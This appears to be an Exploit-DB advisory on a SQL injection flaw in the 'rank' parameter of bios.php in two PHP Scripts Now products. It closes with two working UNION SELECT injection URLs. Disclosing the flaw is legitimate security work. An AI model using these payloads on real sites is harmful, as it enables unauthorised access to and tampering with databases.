PHP Scripts Now (Multiple Products) - 'bios.php?rank' SQL Injection

EDB-ID:

34894


Platform:

PHP

Published:

2009-07-20

source: http://www.securityfocus.com/bid/44306/info
 
Multiple PHP Scripts Now products are prone to an input-validation vulnerability that can be exploited to conduct SQL-injection and cross-site scripting attacks.
 
Exploiting this vulnerability could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
The following products are affected:
 
PHP Scripts Now President Bios
PHP Scripts Now World's Tallest Buildings 

http://www.example.com/tallestbuildings/bios.php?rank=1+and+1=null+union+select+1,version(),3,4,5,6,7,8,9--
http://www.example.com/presidents/bios.php?rank=-1%20union%20all%20select%201,version(),3,4,5,6,7,8,9,10%20from%20presidents